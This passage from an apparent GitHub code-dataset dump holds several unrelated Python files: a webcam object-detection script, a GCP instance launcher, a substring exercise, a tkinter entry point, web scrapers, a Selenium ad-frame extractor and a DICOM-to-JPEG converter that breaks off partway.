os.path.exists(lokasi):\r\n\tprint('Lokasi Cache: ', lokasi)\r\n\tos.makedirs(lokasi)\r\n\r\n\r\nbot = telepot.Bot(token)\r\nnet = cv2.dnn.readNet(\"training_data.weights\", \"training_data.cfg\")\r\nclasses = []\r\nwith open(\"object.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\r\n\r\n# Loading web cam\r\ncamera = cv2.VideoCapture(1)\r\n\r\nwhile True:\r\n _,img = camera.read()\r\n height, width, channels = img.shape\r\n\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(img, 0.00392, (320, 320), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n # Showing informations on the screen\r\n class_ids = []\r\n confidences = []\r\n boxes = []\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5:\r\n # Object detected\r\n center_x = int(detection[0] * width)\r\n center_y = int(detection[1] * height)\r\n w = int(detection[2] * width)\r\n h = int(detection[3] * height)\r\n # Rectangle coordinates\r\n x = int(center_x - w / 2)\r\n y = int(center_y - h / 2)\r\n boxes.append([x, y, w, h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\r\n\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n for i in range(len(boxes)):\r\n if i in indexes:\r\n x, y, w, h = boxes[i]\r\n label = str(classes[class_ids[i]])\r\n print(label)\r\n color = colors[i]\r\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\r\n cv2.putText(img, label, (x, y + 30), font, 3, color, 3)\r\n cv2.imwrite(lokasi+'/{}.jpg'.format(label),img)\r\n #bot.sendMessage(id_penerima,label)\r\n #bot.sendPhoto(id_penerima, photo=open('History/'+label+'.jpg','rb') )\r\n\r\n cv2.imshow(\"Image\", img)\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"Dzikrul-Hamdi-Nasution/Deteksi-Pencurian-dalm-Ruangan-","sub_path":"V2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4111846762","text":"import json\nfrom typing import Any, List\nfrom uuid import uuid4\n\nimport arbiter\nfrom google.api_core.extended_operation import ExtendedOperation\nfrom google.cloud import compute_v1\nfrom google.cloud.compute_v1.types import Image\nfrom google.oauth2.service_account import Credentials\n\nfrom control_tower.cloud.common import get_instances_requirements, get_instance_init_script, \\\n wait_for_instances_start\nfrom control_tower.run import logger\n\n\ndef wait_for_extended_operation(\n operation: ExtendedOperation, verbose_name: str = \"operation\", timeout: int = 300\n) -> Any:\n \"\"\"\n This method will wait for the extended (long-running) operation to\n complete. 
If the operation is successful, it will return its result.\n If the operation ends with an error, an exception will be raised.\n If there were any warnings during the execution of the operation\n they will be printed to sys.stderr.\n\n Args:\n operation: a long-running operation you want to wait on.\n verbose_name: (optional) a more verbose name of the operation,\n used only during error and warning reporting.\n timeout: how long (in seconds) to wait for operation to finish.\n If None, wait indefinitely.\n\n Returns:\n Whatever the operation.result() returns.\n\n Raises:\n This method will raise the exception received from `operation.exception()`\n or RuntimeError if there is no exception set, but there is an `error_code`\n set for the `operation`.\n\n In case of an operation taking longer than `timeout` seconds to complete,\n a `concurrent.futures.TimeoutError` will be raised.\n \"\"\"\n result = operation.result(timeout=timeout)\n\n if operation.error_code:\n logger.error(\n f\"Error during {verbose_name}: \"\n f\"[Code: {operation.error_code}]: {operation.error_message}\")\n logger.error(f\"Operation ID: {operation.name}\")\n raise operation.exception() or RuntimeError(operation.error_message)\n\n if operation.warnings:\n logger.warning(f\"Warnings during {verbose_name}:\\n\")\n for warning in operation.warnings:\n logger.warning(f\" - {warning.code}: {warning.message}\")\n\n return result\n\n\ndef get_ubuntu_image(credentials: Credentials) -> Image:\n image_client = compute_v1.ImagesClient(credentials=credentials)\n newest_image = image_client.get_from_family(project=\"ubuntu-os-cloud\",\n family=\"ubuntu-2204-lts\")\n return newest_image\n\n\ndef get_machine_type(cpu, memory):\n memory_in_mb = memory << 10\n cpu = cpu if cpu % 2 == 0 else cpu + 1\n return f\"custom-{cpu}-{memory_in_mb}\"\n\n\ndef create_instance(\n credentials: Credentials, name: str, spot: bool, user_data: str, project: str,\n zone: str, machine_type: str\n) -> ExtendedOperation:\n instance_client = compute_v1.InstancesClient(credentials=credentials)\n instance = compute_v1.Instance(\n name=name,\n machine_type=f'zones/{zone}/machineTypes/{machine_type}',\n disks=[compute_v1.AttachedDisk(\n architecture=\"X86_64\",\n auto_delete=True,\n boot=True,\n disk_size_gb=10,\n initialize_params={\n \"source_image\": get_ubuntu_image(credentials).self_link\n }\n )],\n metadata={\n \"items\": [\n {'key': 'startup-script', 'value': user_data}]\n }\n )\n network_interface = compute_v1.NetworkInterface()\n access = compute_v1.AccessConfig()\n access.type_ = compute_v1.AccessConfig.Type.ONE_TO_ONE_NAT.name\n access.name = \"External NAT\"\n network_interface.access_configs = [access]\n instance.network_interfaces = [network_interface]\n if spot:\n instance.scheduling = compute_v1.Scheduling()\n instance.scheduling.provisioning_model = (\n compute_v1.Scheduling.ProvisioningModel.SPOT.name\n )\n instance.scheduling.instance_termination_action = \"DELETE\"\n\n return instance_client.insert(project=project,\n zone=zone,\n instance_resource=instance)\n\n\ndef create_gcp_instances(args, gcp_settings):\n logger.info(\"Requesting GCP Instances...\")\n queue_name = str(uuid4())\n finalizer_queue_name = str(uuid4())\n\n cpu, instance_count, memory = get_instances_requirements(args, gcp_settings, queue_name)\n machine_type = get_machine_type(cpu, memory)\n user_data = get_instance_init_script(args, cpu, finalizer_queue_name, memory, queue_name, instance_count)\n service_account_info = json.loads(gcp_settings[\"service_account_info\"])\n 
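# build OAuth2 service-account credentials for the GCP clients from the parsed key dict\n    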
credentials = Credentials.from_service_account_info(service_account_info)\n\n instance_names = [f\"test-{i + 1}-{queue_name[:8]}\" for i in range(instance_count)]\n operations = [\n create_instance(\n credentials=credentials,\n name=instance_name,\n spot=gcp_settings[\"instance_type\"] == \"spot\",\n user_data=user_data,\n project=gcp_settings[\"project\"],\n zone=gcp_settings[\"zone\"],\n machine_type=machine_type\n )\n for instance_name in instance_names\n ]\n for instance, operation in zip(instance_names, operations):\n wait_for_extended_operation(operation, f\"instance {instance} creation\")\n logger.info(f\"Instance {instance} created.\")\n\n wait_for_instances_start(\n args, instance_count,\n lambda: terminate_instances(credentials, gcp_settings[\"project\"],\n gcp_settings[\"zone\"], instance_names)\n )\n terminate_task_kwargs = {\n \"service_account_info\": service_account_info,\n \"project\": gcp_settings[\"project\"],\n \"zone\": gcp_settings[\"zone\"],\n \"instances\": instance_names\n }\n\n finalizer_task = arbiter.Task(\"terminate_gcp_instances\", queue=finalizer_queue_name,\n task_type=\"finalize\", task_kwargs=terminate_task_kwargs)\n return finalizer_task\n\n\ndef terminate_instances(\n credentials: Credentials, project: str, zone: str, instances: List[str]\n):\n instance_client = compute_v1.InstancesClient(credentials=credentials)\n operations = [\n instance_client.delete(\n project=project,\n zone=zone,\n instance=instance_name\n ) for instance_name in instances\n ]\n for instance, operation in zip(instances, operations):\n wait_for_extended_operation(operation, f\"instance {instance} termination\")\n logger.info(f\"Instance {instance} terminated.\")\n","repo_name":"carrier-io/control_tower","sub_path":"control_tower/cloud/gcp.py","file_name":"gcp.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14952915412","text":"''' 1) Write a Python function that takes two strings as input and find the longest substring that is \r\ncommon to both strings.'''\r\n\r\ndef lcs(string1, string2):\r\n longest_length = 0\r\n ending_index = 0\r\n table = [[0] * (len(string2) + 1) for _ in range(len(string1) + 1)]\r\n\r\n for i in range(1, len(string1) + 1):\r\n for j in range(1, len(string2) + 1):\r\n if string1[i - 1] == string2[j - 1]:\r\n table[i][j] = table[i - 1][j - 1] + 1\r\n if table[i][j] > longest_length:\r\n longest_length = table[i][j]\r\n ending_index = i\r\n longest_substring = string1[ending_index - longest_length:ending_index]\r\n\r\n return longest_substring\r\n\r\nstr1 = \"foobarbaz\"\r\nstr2 = \"barfoobaz\"\r\nresult = lcs(str1, str2)\r\nprint(result)\r\n\r\nstr3 = 'abcdefg'\r\nstr4 = 'xyabcz'\r\nresult = lcs(str3, str4)\r\nprint(result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"VDB11/Coding-Challenge","sub_path":"Challenge_1.py","file_name":"Challenge_1.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33916500691","text":"\"\"\"Run tkinter aligner UI part, based on aligner_ui.py\"\"\"\n\nimport os\nimport tkinter as tk\nfrom tkinter import messagebox\n# import atexit\n\nimport logzero\nfrom logzero import logger\n\nfrom tkaligner.aligner_ui import Aligner\n\n\ndef tkaligner() -> None:\n \"\"\" tkinter aligner UI part\n \"\"\"\n\n root = tk.Tk()\n\n # top = tk.Toplevel(root)\n # Aligner(top)\n\n Aligner(root)\n\n logger.debug(\"tkaligner debug \")\n\n def 
on_closing():\n if messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n root.destroy()\n\n root.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n\n _ = os.environ.get(\"ALIGNER_DEBUG\")\n if _ is not None and _.lower() in [\"1\", \"true\"]:\n logzero.loglevel(10) # 10: DEBUG, default 20: INFO:\n else:\n logzero.loglevel(20)\n logger.info('os.environ.get(\"ALIGNER_DEBUG\"): %s', _)\n\n tkaligner()\n","repo_name":"ffreemt/tkaligner-bumblebee","sub_path":"tkaligner/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37199508563","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass BookSpider(scrapy.Spider):\n name = 'book'\n allowed_domains = ['jinyongwang.com']\n start_urls = ['http://www.jinyongwang.com/book/']\n\n def parse(self, response):\n # //p[@class='title']/a[starts-with(@href, '/n')] 新修版\n for link in response.xpath(\"//p[@class='title']/a[starts-with(@href, '/n')]/@href\").extract():\n yield scrapy.Request(response.urljoin(link), callback=self.book_parse)\n\n def book_parse(self, response):\n # //h1[@class='title']/span/text() Book name\n # //ul[@class='mlist']/li/a Chapter link\n for link in response.xpath(\"//ul[@class='mlist']/li/a/@href\").extract():\n yield scrapy.Request(response.urljoin(link), callback=self.chap_parse)\n\n def chap_parse(self, response):\n # //div[@class='topleft']/span/a/text() Book name\n # //h1[@id='title']/text() Chapter name\n # //div[@id='vcon']/p/text() Content\n yield {\n 'sn': response.url.split('/')[-1].split('.')[0],\n 'book': response.xpath(\"//div[@class='topleft']/span/a/text()\").extract()[1],\n 'chap': response.xpath(\"//h1[@id='title']/text()\").extract_first(),\n 'lines': response.xpath(\"//div[@id='vcon']/p/text()\").extract(),\n }\n","repo_name":"alai04/scrapy-study","sub_path":"jinyong/jinyong/spiders/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71510421634","text":"from typing import Tuple\nfrom time import sleep\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom os import path\nimport pyautogui\nimport pandas as pd \nimport os\n\n\nclass CreativeFrameExtractor:\n '''\n Class responsible for Extracting Creative Start and End Frames.\n It requires a chrome webdriver compatible with selenium to be\n installed/included in the run environment path.\n '''\n\n def __init__(self, preview_url: str, \n save_location: str = '',\n browser_edges: Tuple[float, float] = (70, 1039)) -> None:\n \n self.preview_url = preview_url\n self.browser_edges = browser_edges\n self.save_location = save_location\n self.engagement_type = \"tap\"\n self.seconds = []\n self.opt = Options()\n self.opt.add_argument(\"--hide-scrollbars\")\n self.opt.add_experimental_option(\n \"excludeSwitches\", [\"enable-automation\"])\n # Browser Logs\n self.capabilities = DesiredCapabilities.CHROME\n self.capabilities[\"goog:loggingPrefs\"] = {\"browser\": \"ALL\"}\n\n def is_status_complete(self, passed_driver) -> 
bool:\n '''\n Function to check status of the AD-Unit and its completion.\n '''\n # Retrieve logs from browser\n logs = passed_driver.get_log(\"browser\")\n\n for log in logs:\n # Select logs coming from AD-Unit\n if log[\"source\"] == \"console-api\":\n # Extract message from log\n message = log[\"message\"]\n\n if '\"GAME CREATED\"' in message or '\"DROPPED\"' in message:\n # Start Recording Game\n print(\"Starting Recording AD-UNIT...\")\n print(log)\n return False\n\n if '\"START\"' in message:\n # Engaged\n print(\"AD-UNIT Engaged...\")\n print(log)\n return False\n\n if '\"GAME COMPLETE\"' in message:\n # Stop Recording Game\n print(\"Stopped Recording AD-UNIT...\")\n print(log)\n return True\n\n return True\n \n \n\n def _imitate_engagement(self, ad_size: Tuple[float, float]) -> None:\n '''\n Function to imitate a given engagement type.\n '''\n center = (ad_size[0]/2, self.browser_edges[0] + (ad_size[1]/2))\n\n if self.engagement_type == \"tap\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.leftClick()\n\n elif self.engagement_type == \"swipe right\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.dragRel(center[0], 0, duration=1)\n\n elif self.engagement_type == \"swipe left\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.dragRel(-center[0], 0, duration=1)\n\n elif self.engagement_type == \"tap and hold\":\n pyautogui.moveTo(center[0], center[1], duration=1)\n pyautogui.click()\n\n elif self.engagement_type == \"scrub\":\n pyautogui.moveTo(center[0] - (1/2 * center[0]),\n center[1] - (2/3 * center[1]), duration=0.2)\n pyautogui.dragRel(center[0], 0, duration=0.2)\n pyautogui.dragRel(-center[0], (1/3 * center[1]), duration=0.2)\n pyautogui.dragRel(center[0], 0, duration=0.2)\n pyautogui.dragRel(-center[0], (1/3 * center[1]), duration=0.2)\n pyautogui.dragRel(center[0], 0, duration=0.2)\n \n\n def generate_frames(self) -> None:\n '''\n Function to generate creative start and end frames.\n '''\n # Initialize Selenium WebDriver\n driver = webdriver.Chrome(\n options=self.opt, desired_capabilities=self.capabilities, )\n # Maximize WebDriver's Window to Maximum Size\n driver.maximize_window()\n\n try:\n # Load AD-Unit through Selenium\n driver.get(self.preview_url)\n\n # Locate AD-Unit Element from Browser\n canvas = driver.find_element(By.TAG_NAME, \"canvas\")\n\n # Capture Start Frame\n canvas.screenshot(\n os.path.join(self.save_location, 'start_frame.png'))\n print('Start Frame captured')\n\n ad_size = (canvas.size.get(\"width\"), canvas.size.get(\"height\"))\n \n self._imitate_engagement(ad_size)\n t1 = datetime.now()\n\n WebDriverWait(driver, 30).until(self.is_status_complete)\n\n sleep(20)\n t2 = datetime.now()\n\n delta = t2 - t1\n canvas.screenshot(os.path.join(self.save_location,'end_frame.png'))\n print('End Frame Captured')\n sec = delta.total_seconds()\n self.seconds.append(sec)\n driver.close()\n\n except TimeoutException:\n print(\"TimeOut Exception Fired\")\n print(\"AD-Unit Status Console Logs did not Complete. 
Engagement Failed.\")\n self.seconds.append(0)\n driver.close()\n\n except NoSuchElementException:\n self.seconds.append(0)\n print(f\"AD-Unit Failed to Load: {self.preview_url}\")\n driver.close()\n \n def save(self, df):\n df['video_length'] = self.seconds\n df.to_csv(\"video_length.csv\")\n\nif __name__ == \"__main__\":\n path = \"../data/performance_data.csv\"\n df = pd.read_csv(path)\n game_id_col = df['game_id']\n preview_link = df['preview_link']\n parent_dir = \"../data/extracted_images\"\n for i in range(len(game_id_col)):\n print(\"Processing asset \" + game_id_col[i] + \"index \" + str(i))\n path = os.path.join(parent_dir, game_id_col[i])\n if not os.path.isdir(path):\n os.mkdir(path)\n extract = CreativeFrameExtractor(preview_link[i],path)\n extract.generate_frames()\n extract.save(df['game_id'])\n\n","repo_name":"reiten-g3-ad-challnage/computer-vision-for-creative-optimisation","sub_path":"scripts/creativeErameExtractor.py","file_name":"creativeErameExtractor.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10145169746","text":"#크롤링 하여 이미지 저장\nimport requests\nfrom SearchList import getSearchList\nimport pickle\n\nsearch_list = getSearchList(\"https://news.naver.com/\", \"ul.hdline_article_list\")\ndiv_list = search_list[0].find_all('div', class_='hdline_article_tit')\nimgList = []\nfor i, element in enumerate(div_list):\n imgTags = getSearchList(\"https://news.naver.com\" + element.find(\"a\")[\"href\"], \"div#articleBodyContents img\")\n\n images = []\n for j, img in enumerate(imgTags) :\n src = img.get(\"src\")\n response = requests.get(src[:src.index(\"?\")] )\n assert response.status_code is 200\n\n imgUrl = \"newImg\"+str(i)+str(j)+\".jpg\"\n images.append(\"./\"+imgUrl)\n with open(\"news/\"+imgUrl, \"wb\") as fp :\n fp.write(response.content)\n\n imgList.append(images)\n\nprint(imgList)\n\nwith open(\"news/imgList.txt\", \"wb\") as fp :\n pickle.dump(imgList, fp)","repo_name":"comstudy21joon/python","sub_path":"ch12_webscrap/ch12ex06.py","file_name":"ch12ex06.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26450481134","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport os #使用下面的自动读取路径下文加名,需要加上\nfrom PIL import Image\nimport numpy as np\nimport SimpleITK as STK\nimport pydicom\nimport sys #不加这个无法使用opencv\nsys.path.append('C:\\\\Users\\\\zhong\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37\\\\Lib\\\\site-packages')\nimport cv2\nimport xlwt\n\n\nRead_Path = 'E:\\\\CT coronary extraction'\nWrite_Path = 'E:\\\\ComplexDicomReadTest'\nDicom_FileName = []\nfor fpathe, dirs, fs in os.walk(Read_Path): #遍历找出路径下的所有文件,并在list中写出所有文件绝对读路径\n for f in fs:\n Each_File_Name = os.path.join(fpathe, f) #当前遍历到的这个文件的文件名\n Each_File_Handle = open(Each_File_Name, \"rb\") #以字节方式读这个文件\n Each_File_Handle.seek(128, 0) #指针偏移128\n DICOM_ORNOT = Each_File_Handle.read(4) #读取4个字节,也就是128,129,139,131这4个自己\n if DICOM_ORNOT[0] == 68 and DICOM_ORNOT[1] == 73 and DICOM_ORNOT[2] == 67 and DICOM_ORNOT[3] == 77:\n #判断这4个字节是否为大写的DICM,如果是文件为dicom文件,文件名加入dicom列表\n Dicom_FileName.append(os.path.join(fpathe, f))\n\n\nfor i in range(len(Dicom_FileName)): #对遍历出来的每个dicom文件\n Dicom_Head = pydicom.dcmread(Dicom_FileName[i]) #读取头文件信息\n #HeadInfo = [] #建立一个空的list对象存放所有dicom header info\n switch = 0 #当图像是灰度图而不是彩色,并且有overlay数据时,因为要扩充为rgb3维数据color,\n # 
而且无法赋值给img_array[0/j]=color,因为整个矩阵不可能改变维度,所以用switch来标识是否\n # 直接cv2.imwrite(Image_path, color_img),是的话switch =1,否则为0,证明灰度图无overlay数据,\n #常规写入cv2.imwrite(Image_path, img_array[0/j])即可\n if \"PatientName\" in Dicom_Head: #从这里开始提取各种需要的参数,缺失的补充为NA\n PatientName = str(Dicom_Head.PatientName)\n else:\n PatientName = \"NA\"\n if \"PatientID\" in Dicom_Head:\n PatientID = str(Dicom_Head.PatientID)\n else:\n PatientID = \"NA\"\n if \"PatientBirthDate\" in Dicom_Head:\n PatientBirthDate = str(Dicom_Head.PatientBirthDate)\n else:\n PatientBirthDate = \"NA\"\n if \"PatientSex\" in Dicom_Head:\n PatientSex = str(Dicom_Head.PatientSex)\n else:\n PatientSex = \"NA\"\n if \"StudyDate\" in Dicom_Head:\n StudyDate = str(Dicom_Head.StudyDate)\n else:\n StudyDate = \"NA\"\n if \"InstitutionName\" in Dicom_Head:\n InstitutionName = str(Dicom_Head.InstitutionName)\n else:\n InstitutionName = \"NA\"\n if \"StudyID\" in Dicom_Head:\n StudyID = str(Dicom_Head.StudyID)\n else:\n StudyID = \"NA\"\n if \"StudyInstanceUID\" in Dicom_Head:\n StudyInstanceUID = str(Dicom_Head.StudyInstanceUID)\n else:\n StudyInstanceUID = PatientName + PatientID + StudyID + StudyDate #注意最终显示的病例是按StudyInstanceUID\n # 来区分的,如果这个值缺失,按照这样的补全补上,否则无法提取jpg图片\n if \"SeriesNumber\" in Dicom_Head:\n SeriesNumber = str(Dicom_Head.SeriesNumber)\n else:\n SeriesNumber = \"NA\"\n if \"SeriesInstanceUID\" in Dicom_Head:\n SeriesInstanceUID_full = str(Dicom_Head.SeriesInstanceUID)\n else:\n SeriesInstanceUID_full = \"00000\" + SeriesNumber #注意最终显示的序列是按SeriesInstanceUID\n # 来写文件夹单独显示块的,如果这个值缺失,用SeriesNumber补上,为了保证长度,加5个0\n if \"InstanceNumber\" in Dicom_Head:\n InstanceNumber = str(Dicom_Head.InstanceNumber)\n else:\n InstanceNumber = \"NA\"\n if \"RecommendedDisplayFrameRate\" in Dicom_Head:\n RecommendedDisplayFrameRate = str(Dicom_Head.RecommendedDisplayFrameRate)\n else:\n RecommendedDisplayFrameRate = \"NA\"\n if \"WindowCenter\" in Dicom_Head:\n if type(Dicom_Head.WindowCenter) == pydicom.multival.MultiValue : #比较坑人的是窗框床位居然有是数组的,比如例子CT\n #如果是这种类型,去数组的[0]就是窗框窗位值\n WindowCenter = str(Dicom_Head.WindowCenter[0])\n else:\n WindowCenter = str(Dicom_Head.WindowCenter)\n else:\n WindowCenter = \"NA\"\n if \"WindowWidth\" in Dicom_Head:\n if type(Dicom_Head.WindowWidth) == pydicom.multival.MultiValue :\n WindowWidth = str(Dicom_Head.WindowWidth[0])\n else:\n WindowWidth = str(Dicom_Head.WindowWidth)\n else:\n WindowWidth = \"NA\"\n if \"Modality\" in Dicom_Head:\n Modality = str(Dicom_Head.Modality)\n else:\n Modality = \"NA\"\n\n #用extend方法把信息一次加进来\n #HeadInfo.extend([PatientName,PatientID,PatientBirthDate,PatientSex,StudyDate,InstitutionName,StudyID,StudyInstanceUID,SeriesNumber,InstanceNumber,RecommendedDisplayFrameRate])\n Write_Path_Folder_StudyInstanceUID = Write_Path + PatientName + \"_\" + Modality + \"_\" + StudyInstanceUID #第一分类标准为StudyInstanceUID,\n # 如果写入路径下没有这个文件夹,则建立一个这个名字的文件夹,存放所有这个study的图片\n ifexist_1 = os.path.exists(Write_Path_Folder_StudyInstanceUID)\n if not ifexist_1 :\n os.makedirs(Write_Path_Folder_StudyInstanceUID)\n\n #建立了StudyInstanceUID文件夹后,把dicom header的信息写入xls文件存在该目录下,每个信息换一行\n DicomInfoFile_Path = Write_Path_Folder_StudyInstanceUID + \"\\\\\" + PatientName + \"_\" + Modality + \"_\" + StudyInstanceUID + \"_DicomInfo.xls\"\n ifexist_2 = os.path.exists(DicomInfoFile_Path)\n if not ifexist_2 :\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)\n sheet = book.add_sheet('dicom_information', cell_overwrite_ok=True)\n sheet.write(0, 0, PatientName)\n sheet.write(1, 0, PatientID)\n sheet.write(2, 0, PatientBirthDate)\n 
sheet.write(3, 0, PatientSex)\n sheet.write(4, 0, StudyDate)\n sheet.write(5, 0, InstitutionName)\n #sheet.write(6, 0, StudyID)\n #sheet.write(7, 0, StudyInstanceUID)\n #sheet.write(8, 0, SeriesNumber)\n #sheet.write(9, 0, InstanceNumber)\n #sheet.write(10, 0, RecommendedDisplayFrameRate)\n #sheet.write(11, 0, WindowCenter)\n #sheet.write(12, 0, WindowWidth)\n #sheet.write(13, 0, Modality)\n book.save(DicomInfoFile_Path)\n\n SeriesInstanceUID = SeriesInstanceUID_full[-6:-1] #避免文件名太长无法成功创建文件夹\n\n # 第二分类标准为SeriesNumber,如果StudyInstanceUID文件夹下没有这么一个文件夹,则建立一个,存储同一序列的jpg图片\n Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID = Write_Path_Folder_StudyInstanceUID + \"\\\\\" + SeriesInstanceUID\n ifexist_3 = os.path.exists(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID)\n if not ifexist_3 :\n os.makedirs(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID)\n\n #同时要建立一个compress文件夹,存放compress后的普通片\n Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress = Write_Path_Folder_StudyInstanceUID + \"\\\\\" + SeriesInstanceUID + \"_Compress\"\n ifexist_4 = os.path.exists(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress)\n if not ifexist_4 :\n os.makedirs(Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress)\n\n #用STK读入dicom文件的图片矩阵\n\n\n img_series = STK.ReadImage(Dicom_FileName[i])\n img_array = STK.GetArrayFromImage(img_series)\n\n\n Image_Number = int(img_array.shape[0])\n #对于只有一副图的dicom文件,说明其属于多个dicom文件构成一个序列的情况,其必有InstanceNumber,则以\n #StudyInstanceUID + \"_\" + SeriesNumber + \"_\" + InstanceNumber + \".jpg\"的方式命名\n #而后在Write_Path_Folder_StudyInstanceUID_SeriesNumber和Write_Path_Folder_StudyInstanceUID_SeriesNumber_Compress\n #文件夹下分别写入高质量和压缩图片\n\n if Image_Number == 1 : #如果一个dicom文件里只有一张图,说明属于第一种情况:多幅图构成一个序列的,这些图之间\n #依靠InstanceNumber来区分先后顺序,因此图片的命名方式为:\n # StudyInstanceUID + \"_\" + SeriesNumber + \"_\" + InstanceNumber + \".jpg\"\n Image_name = StudyInstanceUID + \"_\" + SeriesInstanceUID + \"_\" + InstanceNumber + \".jpg\"\n Image_path = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID + \"\\\\\" + Image_name\n Image_path_compress = Write_Path_Folder_StudyInstanceUID_SeriesInstanceUID_Compress + \"\\\\\" + Image_name\n # 如果dicom head 含有窗宽窗位信息,用自己写的函数调节窗宽窗位--ISK的函数不靠谱啊,彩色影像如果含有窗宽窗位怎么办\n #就是下面if len(img_array[j].shape) == 3,这种应该没有窗框窗位把,不然三色怎么调节?但是如那个金色的报告呢\n #用TianKeng来转换uint16成float32(注意是双边,32才能保证对接),uint*255避免溢出的错误\n if WindowCenter != \"NA\" and WindowWidth != \"NA\":\n c = int(WindowCenter)\n w = int(WindowWidth)\n min = c - w / 2\n uint2float = np.float32(img_array[0])\n uint2float = uint2float - min\n uint2float = uint2float * (255/w)\n uint2float[uint2float < 0] = 0\n uint2float[uint2float > 255] = 255\n img_array[0] = np.uint16(uint2float)\n\n #用cv2的imwrite写入高质量图片\n #填补上opencv里面BGR2RBG的坑,但要注意,其实img_array[0]有512,512的灰度图,还有512,512,3的彩色图---还有1024的天哪哈哈哈\n if len(img_array[0].shape) == 3: #对于dicom解析出的图为彩色图的,要进行BGR2RGB的转化,不然存的时候颜色不对\n imgBGR2RGB = cv2.cvtColor(img_array[0], cv2.COLOR_BGR2RGB)\n try: #对彩色通用测试是否有overlay信息,如果有,就将overlay信息用黄色替换图片中相应的像素值\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = 
int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit += 1\n\n arr = arr[:expected_bit_length]\n\n if overlay_frames == 1:\n arr = arr.reshape(rows, cols)\n\n # 自定义的金色描述标注信息\n imgBGR2RGB[np.where(arr != 0)] = [120, 251, 251]\n\n except KeyError:\n print(\"No Overlay Data in Dicom File\")\n cv2.imwrite(Image_path, imgBGR2RGB)\n else:\n try: #如果dicom解析出的图示灰度图,又有overlay信息的,先要将图片转化为彩色图,再标注,否则\n #标注出的是255纯白色的,无法与图像原组织区分开(如果原组织也是白色)\n overlay_data = Dicom_Head[0x60003000].value\n rows = Dicom_Head[0x60000010].value\n cols = Dicom_Head[0x60000011].value\n overlay_frames = Dicom_Head[0x60000015].value\n overlay_type = Dicom_Head[0x60000040].value\n bits_allocated = Dicom_Head[0x60000100].value\n overlay_origin = Dicom_Head[0x60000050].value\n\n np_dtype = np.dtype('uint8')\n length_of_pixel_array = len(overlay_data)\n expected_length = rows * cols\n\n if bits_allocated == 1:\n expected_bit_length = expected_length\n expected_length = int(expected_length / 8) + (expected_length % 8 > 0)\n\n bit = 0\n arr = np.ndarray(shape=(length_of_pixel_array * 8), dtype=np_dtype)\n\n for byte in overlay_data:\n for bit in range(bit, bit + 8):\n arr[bit] = byte & 1\n byte >>= 1\n bit 